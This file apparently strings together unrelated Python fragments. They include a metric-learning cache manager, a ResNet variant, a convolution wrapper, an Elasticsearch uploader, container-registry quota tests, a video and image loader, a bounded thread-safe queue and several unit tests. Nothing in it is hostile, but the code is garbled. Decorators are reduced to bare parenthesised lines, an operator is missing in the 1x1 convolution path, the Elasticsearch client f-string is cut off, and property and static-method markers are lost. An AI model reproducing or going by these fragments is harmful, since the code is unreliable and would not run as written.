train_dataloader.set_salt('train')
if (val_dataloader is not None):
val_dataloader.set_salt('val')
is_persisted = cls.check_encoders_persisted(cache_config.save_dir, cache_encoders)
if (not is_persisted):
if is_full_cache_possible:
cls._label_cache_train_mode(train_dataloader, val_dataloader)
cache_collator.mode = CacheMode.FILL
with warnings.catch_warnings():
warnings.filterwarnings('ignore', category=PossibleUserWarning, message='The dataloader, .*')
cls._fill_cache(trainer=trainer, cache_encoders=cache_encoders, train_dataloader=train_dataloader, val_dataloader=val_dataloader, cache_config=cache_config)
cache_collator.mode = CacheMode.TRAIN
logger.debug('Caching has been successfully finished')
cls.save_cache(cache_config.save_dir, cache_encoders, train_dataloader, val_dataloader)
else:
cls.load_cache(cache_config.save_dir, cache_encoders, train_dataloader, val_dataloader)
if is_full_cache_possible:
cls._enable_label_cache(train_dataloader, val_dataloader)
return True
def _fill_cache(cls, trainer: pl.Trainer, cache_encoders: Dict[(str, CacheEncoder)], train_dataloader: SimilarityDataLoader, val_dataloader: SimilarityDataLoader, cache_config: CacheConfig) -> None:
cache_train_dataloader = cls._wrap_cache_dataloader(dataloader=train_dataloader, cache_config=cache_config)
cache_val_dataloader = None
if (val_dataloader is not None):
cache_val_dataloader = cls._wrap_cache_dataloader(dataloader=val_dataloader, cache_config=cache_config)
trainer.predict(CacheModel(cache_encoders), [cache_train_dataloader, cache_val_dataloader], return_predictions=True)
def _unwrap_cache_encoders(cls, encoders: Dict[(str, Encoder)]) -> Dict[(str, Encoder)]:
unwrapped_encoders = {}
for (key, encoder) in encoders.items():
if isinstance(encoder, CacheEncoder):
unwrapped_encoders[key] = encoder.wrapped_encoder
else:
unwrapped_encoders[key] = encoder
return unwrapped_encoders
def _wrap_cache_dataloader(cls, dataloader: SimilarityDataLoader, cache_config: CacheConfig) -> DataLoader:
num_workers = (cache_config.num_workers if (cache_config.num_workers is not None) else dataloader.num_workers)
params = {**dataloader.original_params, 'num_workers': num_workers, 'batch_size': cache_config.batch_size, 'shuffle': False, 'sampler': None}
params.pop('collate_fn')
cache_dl = DataLoader(dataset=dataloader.dataset, collate_fn=dataloader.collate_fn, **params)
return cache_dl
def _label_cache_train_mode(cls, train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
train_dataloader.set_label_cache_mode(LabelCacheMode.learn)
if val_dataloader:
val_dataloader.set_label_cache_mode(LabelCacheMode.learn)
def _enable_label_cache(cls, train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
train_dataloader.set_skip_read(True)
train_dataloader.set_label_cache_mode(LabelCacheMode.read)
if val_dataloader:
val_dataloader.set_skip_read(True)
val_dataloader.set_label_cache_mode(LabelCacheMode.read)
def _encoders_cache_path(cls, dir_path: Optional[str]):
return (os.path.join(dir_path, 'encoders') if dir_path else None)
def check_encoders_persisted(cls, dir_path: Optional[str], encoders: Dict[(str, Encoder)]):
if (not dir_path):
return False
encoders_path = cls._encoders_cache_path(dir_path)
for (key, encoder) in encoders.items():
if (not os.path.exists(os.path.join(encoders_path, key))):
return False
return True
def save_cache(cls, dir_path: Optional[str], encoders: Dict[(str, Encoder)], train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
if (not dir_path):
return
encoders_path = cls._encoders_cache_path(dir_path)
os.makedirs(encoders_path, exist_ok=True)
for (key, encoder) in encoders.items():
if isinstance(encoder, CacheEncoder):
encoder.save_cache(os.path.join(encoders_path, key))
train_dataloader.save_label_cache(os.path.join(dir_path, 'train_labels'))
if val_dataloader:
val_dataloader.save_label_cache(os.path.join(dir_path, 'val_labels'))
logger.debug(f'Cache saved to {dir_path}')
def load_cache(cls, dir_path: str, encoders: Dict[(str, Encoder)], train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
if (not dir_path):
return
encoders_path = cls._encoders_cache_path(dir_path)
for (key, encoder) in encoders.items():
if isinstance(encoder, CacheEncoder):
encoder_cache_path = os.path.join(encoders_path, key)
if (not os.path.exists(encoder_cache_path)):
raise RuntimeError(f'Encoder cache was configured, but not found. Expected to find cache at {encoder_cache_path}, but file does not exists!')
encoder.load_cache(encoder_cache_path)
train_dataloader.load_label_cache(os.path.join(dir_path, 'train_labels'))
if val_dataloader:
val_dataloader.load_label_cache(os.path.join(dir_path, 'val_labels'))
logger.debug(f'Cache loaded from: {dir_path}') |
def init_weight(module_list, conv_init, norm_layer, bn_eps, bn_momentum, **kwargs):
if isinstance(module_list, list):
for feature in module_list:
__init_weight(feature, conv_init, norm_layer, bn_eps, bn_momentum, **kwargs)
else:
__init_weight(module_list, conv_init, norm_layer, bn_eps, bn_momentum, **kwargs) |
def _compute_segment_xform(pos0, pos1):
mid = ((pos0 + pos1) * 0.5)
height = (pos1 - pos0).GetLength()
dir = ((pos1 - pos0) / height)
rot = Gf.Rotation()
rot.SetRotateInto((0.0, 0.0, 1.0), Gf.Vec3d(dir))
scale = Gf.Vec3f(1.0, 1.0, height)
return (mid, Gf.Quath(rot.GetQuat()), scale) |
def write_json_file(file_name, mv_array, metric, basis_names, compression=True, transpose=False, sparse=False, support=None, compression_opts=1):
data_dict = {}
data_dict['version'] = '0.0.1'
dset_data = {}
if transpose:
dset_data['data'] = mv_array.T.tolist()
dset_data['transpose'] = True
else:
dset_data['data'] = mv_array.tolist()
dset_data['transpose'] = False
if sparse:
dset_data['sparse'] = True
if (support is not None):
dset_data['support'] = support.tolist()
else:
raise ValueError('You must specify the support of the multivectors if you explicitly specify sparse storage')
else:
dset_data['sparse'] = False
dset_data['support'] = []
data_dict['dataset'] = dset_data
data_dict['metric'] = metric.tolist()
data_dict['basis_names'] = [str(s) for s in basis_names]
with open(file_name, 'w') as fp:
json.dump(data_dict, fp) |
def _conv2d_wrapper(x, w, stride=1, padding=0, groups=1, transpose=False, flip_weight=True, impl='cuda'):
(out_channels, in_channels_per_group, kh, kw) = _get_weight_shape(w)
if (not flip_weight):
w = w.flip([2, 3])
if ((kw == 1) and (kh == 1) and (stride == 1) and (padding in [0, [0, 0], (0, 0)]) and (not transpose)):
if ((x.stride()[1] == 1) and (min(out_channels, in_channels_per_group) < 64)):
if ((out_channels <= 4) and (groups == 1)):
in_shape = x.shape
x = (w.squeeze(3).squeeze(2) x.reshape([in_shape[0], in_channels_per_group, (- 1)]))
x = x.reshape([in_shape[0], out_channels, in_shape[2], in_shape[3]])
else:
x = x.to(memory_format=torch.contiguous_format)
w = w.to(memory_format=torch.contiguous_format)
x = conv2d_gradfix.conv2d(x, w, groups=groups, impl=impl)
return x.to(memory_format=torch.channels_last)
op = (conv2d_gradfix.conv_transpose2d if transpose else conv2d_gradfix.conv2d)
return op(x, w, stride=stride, padding=padding, groups=groups, impl=impl) |
def get_expire_assets():
assets = Assets.objects.all()
expire_assets = []
for asset in assets:
expire_days = (asset.asset_expire_day - datetime.date.today()).days
if (0 < expire_days <= 30):
expire_assets.append({'asset_type': asset.get_asset_type_display(), 'asset_nu': asset.asset_nu, 'asset_ip': asset.asset_management_ip, 'asset_expire': asset.asset_expire_day, 'expire_days': expire_days})
if (len(expire_assets) > 0):
asset_details = ['{} -> :{}\n IP -> {} \n {} {}\n'.format(expire_asset.get('asset_type'), expire_asset.get('asset_nu'), expire_asset.get('asset_ip'), expire_asset.get('asset_expire'), expire_asset.get('expire_days')) for expire_asset in expire_assets]
content = '{}: \n{}'.format(len(asset_details), ' '.join(asset_details))
wx = WxApi('XXXXXXXXXXXXXXXXX', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
wx.send_msg(subject='', content=content) |
class ElasticUploader(BaseUploader):
client: Elasticsearch = None
upload_params = {}
def get_mp_start_method(cls):
return ('forkserver' if ('forkserver' in mp.get_all_start_methods()) else 'spawn')
def init_client(cls, host, distance, connection_params, upload_params):
init_params = {**{'verify_certs': False, 'request_timeout': 90, 'retry_on_timeout': True}, **connection_params}
cls.client = Elasticsearch(f' basic_auth=(ELASTIC_USER, ELASTIC_PASSWORD), **init_params)
cls.upload_params = upload_params
def upload_batch(cls, ids: List[int], vectors: List[list], metadata: Optional[List[dict]]):
if (metadata is None):
metadata = ([{}] * len(vectors))
operations = []
for (idx, vector, payload) in zip(ids, vectors, metadata):
vector_id = uuid.UUID(int=idx).hex
operations.append({'index': {'_id': vector_id}})
if payload:
operations.append({'vector': vector, **payload})
else:
operations.append({'vector': vector})
cls.client.bulk(index=ELASTIC_INDEX, operations=operations)
def post_upload(cls, _distance):
cls.client.indices.forcemerge(index=ELASTIC_INDEX, wait_for_completion=True, max_num_segments=1)
return {} |
def test_window_by_position__equal_spaced_windows():
ds = simulate_genotype_call_dataset(n_variant=5, n_sample=3, seed=0)
assert (not has_windows(ds))
ds['variant_position'] = (['variants'], np.array([1, 4, 6, 8, 12]))
ds = window_by_position(ds, size=5, offset=1)
assert has_windows(ds)
np.testing.assert_equal(ds[window_contig].values, [0, 0, 0])
np.testing.assert_equal(ds[window_start].values, [0, 2, 4])
np.testing.assert_equal(ds[window_stop].values, [2, 4, 5]) |
def returnArray(wrapArgs, lenArgs, inArgs, includeOutput=False):
def decorator(func):
(func)
def inner(*args):
orig = getattr(_egl, func.__name__)
newArgs = list(args)
for argnum in sorted((wrapArgs + lenArgs)):
if (argnum in wrapArgs):
i = wrapArgs.index(argnum)
item = (orig.argtypes[argnum]._type_ * args[inArgs[i]])()
else:
item = EGLint()
newArgs.insert(argnum, item)
res = orig(*newArgs)
if ((orig.restype is EGLBoolean) and (res.value == 0)):
raise WindowProviderException(f'{func.__name__} failed')
out = []
if includeOutput:
out.append(res)
lengths = []
for argnum in sorted((wrapArgs + lenArgs)):
if (argnum in wrapArgs):
out.append(newArgs[argnum])
else:
lengths.append(newArgs[argnum].value)
if (len(out) == 1):
return out[0]
return tuple(out)
return inner
return decorator |
class ResNet(nn.Module):
def __init__(self, block: Type[Union[(BasicBlock, Bottleneck)]], layers: List[int], num_classes: int=1000, zero_init_residual: bool=False, groups: int=1, width_per_group: int=64, replace_stride_with_dilation: Optional[List[bool]]=None, norm_layer: Optional[Callable[(..., nn.Module)]]=nn.GroupNorm) -> None:
super(ResNet, self).__init__()
self.block = block
if (norm_layer is nn.GroupNorm):
import functools
norm_layer = functools.partial(nn.GroupNorm, num_groups=32)
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
if (replace_stride_with_dilation is None):
replace_stride_with_dilation = [False, False, False]
if (len(replace_stride_with_dilation) != 3):
raise ValueError('replace_stride_with_dilation should be None or a 3-element tuple, got {}'.format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(num_channels=self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2, dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2, dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2, dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((2, 2))
self.fc = nn.Linear((512 * block.expansion), num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block: Type[Union[(BasicBlock, Bottleneck)]], planes: int, blocks: int, stride: int=1, dilate: bool=False) -> nn.Sequential:
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if ((stride != 1) or (self.inplanes != (planes * block.expansion))):
down_list = [conv1x1(self.inplanes, (planes * block.expansion), stride)]
down_list.append(norm_layer(num_channels=(planes * block.expansion)))
downsample = nn.Sequential(*down_list)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups, self.base_width, previous_dilation, norm_layer))
self.inplanes = (planes * block.expansion)
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups, base_width=self.base_width, dilation=self.dilation, norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x: Tensor) -> Tensor:
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = rearrange(x, 'b c h w -> b (h w) c')
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x) |
('torch.__version__', torch_version)
.parametrize('in_w,in_h,in_t,in_channel,out_channel,kernel_size,stride,padding,dilation', [(10, 10, 10, 1, 1, 3, 1, 0, 1), (20, 20, 20, 3, 3, 5, 2, 1, 2)])
def test_conv3d(in_w, in_h, in_t, in_channel, out_channel, kernel_size, stride, padding, dilation):
x_empty = torch.randn(0, in_channel, in_t, in_h, in_w)
torch.manual_seed(0)
wrapper = Conv3d(in_channel, out_channel, kernel_size, stride=stride, padding=padding, dilation=dilation)
wrapper_out = wrapper(x_empty)
x_normal = torch.randn(3, in_channel, in_t, in_h, in_w).requires_grad_(True)
torch.manual_seed(0)
ref = nn.Conv3d(in_channel, out_channel, kernel_size, stride=stride, padding=padding, dilation=dilation)
ref_out = ref(x_normal)
assert (wrapper_out.shape[0] == 0)
assert (wrapper_out.shape[1:] == ref_out.shape[1:])
wrapper_out.sum().backward()
assert (wrapper.weight.grad is not None)
assert (wrapper.weight.grad.shape == wrapper.weight.shape)
assert torch.equal(wrapper(x_normal), ref_out)
x_empty = torch.randn(0, in_channel, in_t, in_h, in_w)
wrapper = Conv3d(in_channel, out_channel, kernel_size, stride=stride, padding=padding, dilation=dilation)
wrapper.eval()
wrapper(x_empty) |
class catch_warnings(warnings.catch_warnings):
def __init__(self, *classes):
super(catch_warnings, self).__init__(record=True)
self.classes = classes
def __enter__(self):
warning_list = super(catch_warnings, self).__enter__()
treat_deprecations_as_exceptions()
if (len(self.classes) == 0):
warnings.simplefilter('always')
else:
warnings.simplefilter('ignore')
for cls in self.classes:
warnings.simplefilter('always', cls)
return warning_list
def __exit__(self, type, value, traceback):
treat_deprecations_as_exceptions() |
def constant_str(value):
if (type(value) == bool):
if value:
return 'true'
else:
return 'false'
elif (type(value) == str):
return (('"' + str(value.encode('unicode-escape').decode())) + '"')
elif isinstance(value, ctypes.Array):
return (('{' + ', '.join(map(str, value))) + '}')
else:
return str(value) |
(netloc='fakegitlab', path='/api/v4/projects/4/deploy_keys/1$', method='DELETE')
def delete_deploykey_handker(_, request):
if (not (request.headers.get('Authorization') == 'Bearer foobar')):
return {'status_code': 401}
return {'status_code': 200, 'headers': {'Content-Type': 'application/json'}, 'content': json.dumps({})} |
class TestQuota():
(autouse=True)
def setup(self, initialized_db):
user = get_user('devtable')
self.org = create_organization(ORG_NAME, f'{ORG_NAME}', user)
self.repo1 = create_repository(ORG_NAME, REPO1_NAME, user)
self.repo1manifest1 = create_manifest_for_testing(self.repo1, [BLOB1, BLOB2])
self.repo1manifest2 = create_manifest_for_testing(self.repo1, [BLOB1, BLOB3])
self.repo2 = create_repository(ORG_NAME, REPO2_NAME, user)
self.repo2manifest3 = create_manifest_for_testing(self.repo2, [BLOB1, BLOB4])
def test_run_backfill(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
def test_adding_blob(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
with patch('data.model.oci.manifest.features', MagicMock()) as mock_features:
mock_features.QUOTA_MANAGEMENT = True
create_manifest_for_testing(self.repo1, [BLOB5])
assert (get_namespace_size(ORG_NAME) == (((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)) + len(BLOB5)))
assert (get_repository_size(self.repo1) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB5)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
def test_subtracting_blob(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
with patch('data.model.gc.features', MagicMock()) as mock_features:
mock_features.QUOTA_MANAGEMENT = True
tag_deleted = _delete_tag_for_manifest(self.repo2manifest3.id)
assert tag_deleted
context = _GarbageCollectorContext(self.repo2)
context.add_manifest_id(self.repo2manifest3.id)
manifest_deleted = _garbage_collect_manifest(self.repo2manifest3.id, context)
assert manifest_deleted
assert (get_namespace_size(ORG_NAME) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == 0)
def test_disabled_namespace(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
self.org.enabled = False
self.org.save()
with patch('data.model.oci.manifest.features', MagicMock()) as mock_features:
mock_features.QUOTA_MANAGEMENT = True
create_manifest_for_testing(self.repo1, [BLOB5])
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
def test_calculate_registry_size(self, initialized_db):
QuotaRegistrySize.insert({'size_bytes': 0, 'running': False, 'queued': True, 'completed_ms': None}).execute()
calculate_registry_size()
registry_size = get_registry_size()
assert (registry_size is not None)
assert (registry_size != 0)
assert (registry_size.size_bytes == sum_registry_size())
def test_queue_registry_size_calculation(self, initialized_db):
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert (not already_queued)
registry_size = get_registry_size()
assert (registry_size is not None)
assert registry_size.queued
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert already_queued
QuotaRegistrySize.update({'running': False, 'queued': False}).execute()
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert (not already_queued)
QuotaRegistrySize.update({'running': True, 'queued': False}).execute()
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert already_queued |
class MediaLoader():
def __init__(self, folder):
logger.debug("Initializing %s: (folder: '%s')", self.__class__.__name__, folder)
logger.info('[%s DATA]', self.__class__.__name__.upper())
self._count = None
self.folder = folder
self.vid_reader = self.check_input_folder()
self.file_list_sorted = self.sorted_items()
self.items = self.load_items()
logger.verbose('%s items loaded', self.count)
logger.debug('Initialized %s', self.__class__.__name__)
def is_video(self):
return (self.vid_reader is not None)
def count(self):
if (self._count is not None):
return self._count
if self.is_video:
self._count = int(count_frames_and_secs(self.folder)[0])
else:
self._count = len(self.file_list_sorted)
return self._count
def check_input_folder(self):
err = None
loadtype = self.__class__.__name__
if (not self.folder):
err = 'ERROR: A {} folder must be specified'.format(loadtype)
elif (not os.path.exists(self.folder)):
err = 'ERROR: The {} location {} could not be found'.format(loadtype, self.folder)
if err:
logger.error(err)
exit(0)
if ((loadtype == 'Frames') and os.path.isfile(self.folder) and (os.path.splitext(self.folder)[1].lower() in _video_extensions)):
logger.verbose("Video exists at: '%s'", self.folder)
retval = cv2.VideoCapture(self.folder)
else:
logger.verbose("Folder exists at '%s'", self.folder)
retval = None
return retval
def valid_extension(filename):
extension = os.path.splitext(filename)[1]
retval = (extension.lower() in _image_extensions)
logger.trace("Filename has valid extension: '%s': %s", filename, retval)
return retval
def sorted_items():
return list()
def process_folder():
return list()
def load_items():
return dict()
def load_image(self, filename):
if self.is_video:
image = self.load_video_frame(filename)
else:
src = os.path.join(self.folder, filename)
logger.trace("Loading image: '%s'", src)
image = cv2_read_img(src, raise_error=True)
return image
def load_video_frame(self, filename):
frame = os.path.splitext(filename)[0]
logger.trace("Loading video frame: '%s'", frame)
frame_no = (int(frame[(frame.rfind('_') + 1):]) - 1)
self.vid_reader.set(cv2.CAP_PROP_POS_FRAMES, frame_no)
(_, image) = self.vid_reader.read()
return image
def save_image(output_folder, filename, image):
output_file = os.path.join(output_folder, filename)
logger.trace("Saving image: '%s'", output_file)
cv2.imwrite(output_file, image) |
class PackageQueue(object):
class Empty(Exception):
def __init__(self):
Exception.__init__(self, 'pop from an empty PackageQueue')
pass
def __init__(self, N, discard_mode='old'):
self._q = deque()
self._condition = threading.Condition()
self._maxlen = int(N)
discard_mode = discard_mode.lower()
if (discard_mode == 'old'):
self._discard_mode = 1
elif (discard_mode == 'new'):
self._discard_mode = 2
else:
raise ValueError('Invalid discard mode.')
def full(self):
return (len(self) >= self._maxlen)
def empty(self):
return (len(self) == 0)
def push(self, x):
condition = self._condition
condition.acquire()
try:
q = self._q
if (len(q) < self._maxlen):
q.append(x)
condition.notify()
elif (self._discard_mode == 1):
q.popleft()
q.append(x)
elif (self._discard_mode == 2):
pass
finally:
condition.release()
def insert(self, x):
condition = self._condition
condition.acquire()
try:
self._q.appendleft(x)
condition.notify()
finally:
condition.release()
def pop(self, block=True):
condition = self._condition
condition.acquire()
try:
q = self._q
if (not block):
if (not len(q)):
raise self.Empty()
elif (block is True):
while (not len(q)):
condition.wait()
elif isinstance(block, float):
if (not len(q)):
condition.wait(block)
if (not len(q)):
raise self.Empty()
else:
raise ValueError('Invalid value for block in PackageQueue.pop().')
return q.popleft()
finally:
condition.release()
def peek(self, index=0):
return self._q[index]
def __len__(self):
return self._q.__len__()
def clear(self):
self._condition.acquire()
try:
self._q.clear()
finally:
self._condition.release() |
class TestAgentInsert(unittest.TestCase):
def _get_simple_dataset(self) -> ChunkedDataset:
dataset = ChunkedDataset('')
dataset.scenes = np.zeros(1, dtype=SCENE_DTYPE)
dataset.frames = np.zeros(3, dtype=FRAME_DTYPE)
dataset.agents = np.zeros(6, dtype=AGENT_DTYPE)
dataset.scenes[0]['frame_index_interval'] = (0, 3)
dataset.frames['agent_index_interval'] = [(0, 3), (3, 5), (5, 6)]
dataset.agents['track_id'] = [0, 1, 2, 0, 1, 0]
return dataset
def test_invalid(self) -> None:
with self.assertRaises(ValueError):
insert_agent(np.zeros(1, dtype=AGENT_DTYPE), 100, self._get_simple_dataset())
with self.assertRaises(ValueError):
dataset = self._get_simple_dataset()
dataset.scenes = np.concatenate([dataset.scenes, dataset.scenes])
insert_agent(np.zeros(1, dtype=AGENT_DTYPE), 100, dataset)
def test_update(self) -> None:
dataset = self._get_simple_dataset()
agent = np.zeros(1, dtype=AGENT_DTYPE)
agent['centroid'] = (1, 1)
agent['yaw'] = 1
agent['label_probabilities'] += 1
insert_agent(agent, 0, dataset)
self.assertTrue(np.allclose(agent['centroid'], dataset.agents[0]['centroid']))
self.assertTrue(np.allclose(agent['yaw'], dataset.agents[0]['yaw']))
self.assertTrue(np.allclose(agent['label_probabilities'], dataset.agents[0]['label_probabilities']))
self.assertTrue(len(dataset.agents), len(self._get_simple_dataset().agents))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'], self._get_simple_dataset().frames['agent_index_interval']))
def test_insert_1(self) -> None:
dataset = self._get_simple_dataset()
agent = np.zeros(1, dtype=AGENT_DTYPE)
agent['centroid'] = (1, 1)
agent['yaw'] = 1
agent['label_probabilities'] += 1
agent['track_id'] += 2
insert_agent(agent, 1, dataset)
expected_index = 5
self.assertTrue(np.allclose(agent['centroid'], dataset.agents[expected_index]['centroid']))
self.assertTrue(np.allclose(agent['yaw'], dataset.agents[expected_index]['yaw']))
self.assertTrue(np.allclose(agent['label_probabilities'], dataset.agents[expected_index]['label_probabilities']))
old_dataset = self._get_simple_dataset()
self.assertTrue(len(dataset.agents), (len(old_dataset.agents) + 1))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][:1], old_dataset.frames['agent_index_interval'][:1]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][(1, 0)], old_dataset.frames['agent_index_interval'][(1, 0)]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][(1, 1)], (old_dataset.frames['agent_index_interval'][(1, 1)] + 1)))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][2:], (old_dataset.frames['agent_index_interval'][2:] + 1)))
def test_insert_2(self) -> None:
dataset = self._get_simple_dataset()
agent = np.zeros(1, dtype=AGENT_DTYPE)
agent['centroid'] = (1, 1)
agent['yaw'] = 1
agent['label_probabilities'] += 1
agent['track_id'] += 1
insert_agent(agent, 2, dataset)
expected_index = (- 1)
self.assertTrue(np.allclose(agent['centroid'], dataset.agents[expected_index]['centroid']))
self.assertTrue(np.allclose(agent['yaw'], dataset.agents[expected_index]['yaw']))
self.assertTrue(np.allclose(agent['label_probabilities'], dataset.agents[expected_index]['label_probabilities']))
old_dataset = self._get_simple_dataset()
self.assertTrue(len(dataset.agents), (len(old_dataset.agents) + 1))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][:(- 1)], old_dataset.frames['agent_index_interval'][:(- 1)]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][((- 1), 0)], old_dataset.frames['agent_index_interval'][((- 1), 0)]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][((- 1), 1)], (old_dataset.frames['agent_index_interval'][((- 1), 1)] + 1))) |
def test_create_manifest_cannot_load_config_blob(initialized_db):
repository = create_repository('devtable', 'newrepo', None)
layer_json = json.dumps({'config': {}, 'rootfs': {'type': 'layers', 'diff_ids': []}, 'history': [{'created': '2018-04-03T18:37:09.Z', 'created_by': 'do something'}]})
(_, config_digest) = _populate_blob(layer_json)
random_data = 'hello world'
(_, random_digest) = _populate_blob(random_data)
remote_digest = sha256_digest(b'something')
builder = DockerSchema2ManifestBuilder()
builder.set_config_digest(config_digest, len(layer_json.encode('utf-8')))
builder.add_layer(random_digest, len(random_data.encode('utf-8')))
manifest = builder.build()
broken_retriever = BrokenRetriever()
with pytest.raises(CreateManifestException):
get_or_create_manifest(repository, manifest, storage, retriever=broken_retriever, raise_on_error=True) |
def test_run_model_singleton_weather_single_array(cec_dc_snl_ac_system, location, weather):
mc = ModelChain(cec_dc_snl_ac_system, location, aoi_model='no_loss', spectral_model='no_loss')
mc.run_model([weather])
assert isinstance(mc.results.weather, tuple)
assert isinstance(mc.results.total_irrad, tuple)
assert isinstance(mc.results.aoi, tuple)
assert isinstance(mc.results.aoi_modifier, tuple)
assert isinstance(mc.results.spectral_modifier, tuple)
assert isinstance(mc.results.effective_irradiance, tuple)
assert isinstance(mc.results.dc, tuple)
assert isinstance(mc.results.cell_temperature, tuple)
assert (len(mc.results.cell_temperature) == 1)
assert isinstance(mc.results.cell_temperature[0], pd.Series) |
(maxsplit=1, no_cmd_split=True, no_replace_variables=True, deprecated_name='repeat')
('win_id', value=cmdutils.Value.win_id)
('count', value=cmdutils.Value.count)
def cmd_repeat(times: int, command: str, win_id: int, count: int=None) -> None:
if (count is not None):
times *= count
if (times < 0):
raise cmdutils.CommandError("A negative count doesn't make sense.")
commandrunner = runners.CommandRunner(win_id)
for _ in range(times):
commandrunner.run_safely(command) |
def test_inspiralfuns_numerical():
logMc = 1.4
q = 0.8
flow = 10.0
merger_type = 'BH'
D = 100.0
(M, eta) = ins.get_M_and_eta(logMc=logMc, q=q)
start_x = ins.startx(M, flow)
end_x = ins.endx(eta, merger_type)
(x, xtimes, dt) = ins.PN_parameter_integration(start_x, end_x, M, eta)
assert (len(x) == 2133591), 'The length of x is not as expected.'
(i_phase, omega, freq) = ins.inspiral_phase_freq_integration(x, dt, M)
(r, rdot) = ins.radius_calculation(x, M, eta)
(A1, A2) = ins.a1_a2_calculation(r, rdot, omega, D, M, eta)
(Aorth, Adiag) = ins.inspiral_strain_polarisations(A1, A2, i_phase)
i_amp = ins.inspiral_strain_amplitude(Aorth, Adiag)
